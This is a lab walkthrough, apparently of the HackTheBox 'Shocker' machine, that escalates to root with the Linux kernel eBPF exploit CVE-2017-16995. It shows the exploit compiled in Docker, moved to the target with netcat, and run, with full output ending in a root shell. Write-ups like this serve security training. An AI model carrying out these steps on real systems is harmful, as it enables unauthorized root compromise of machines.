InfoSec LAB

Shocker_Privilege_Escalation_3

Created: 3 min read

CVE-2017-16995

peas has discovered that the target system is vulnerable to cve-2017-16995

a vulnerability classified as critical has been found in linux kernel up to 4.14.8 (Operating System). Affected is the function check_alu_op of the file kernel/bpf/verifier.c of the component Sign Extension. The manipulation with an unknown input leads to a memory corruption vulnerability. CWE is classifying the issue as CWE-119. The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. This is going to have an impact on confidentiality, integrity, and availability.

Exploit

I found the exploit online

shelly@Shocker:/dev/shm$ gcc
bash: /usr/bin/python: No such file or directory
shelly@Shocker:/dev/shm$ make
bash: /usr/bin/python: No such file or directory
shelly@Shocker:/dev/shm$ cc
bash: /usr/bin/python: No such file or directory

Local compilation is not available. Opting out to remote compilation.

Docker Exploit Development

┌──(kali㉿kali)-[~/archive/htb/labs/shocker]
└─$ docker run -it --entrypoint "/bin/bash" --name shocker  ubuntu:16.04
root@f62cf0dcc337:/# apt update -y ; apt install net-tools netcat gcc gcc-multilib nano git make wget -y

Setting up the environment

root@f62cf0dcc337:~# gcc CVE-2017-16995.c -o CVE-2017-16995

Compile

root@f62cf0dcc337:~# nc 10.10.10.56 3333 < CVE-2017-16995
 
shelly@shocker:/dev/shm$ nc -nlvp 3333 > CVE-2017-16995
Listening on [0.0.0.0] (family 0, port 3333)
Connection from [10.10.14.2] port 3333 [tcp/*] accepted (family 2, sport 42134)
shelly@shocker:/dev/shm$ chmod 755 CVE-2017-16995

Delivery complete

shelly@shocker:/dev/shm$ ./CVE-2017-16995
./CVE-2017-16995
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88001938a600
[*] Leaking sock struct from ffff880017de0800
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff8800183d3680
[*] uid from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff8800183d3680
[*] credentials patched, launching shell...
# whoami
whoami
root
# hostname
hostname
Shocker
# ifconfig
ifconfig
ens192    link encap:Ethernet  HWaddr 00:50:56:b9:89:cf  
          inet addr:10.10.10.56  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:89cf/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:89cf/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:12442 errors:0 dropped:20 overruns:0 frame:0
          tx packets:9216 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:14887158 (14.8 MB)  TX bytes:1763096 (1.7 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:21168 errors:0 dropped:0 overruns:0 frame:0
          tx packets:21168 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:1568156 (1.5 MB)  TX bytes:1568156 (1.5 MB)

System Level Compromise

Interactive Graph View

Backlinks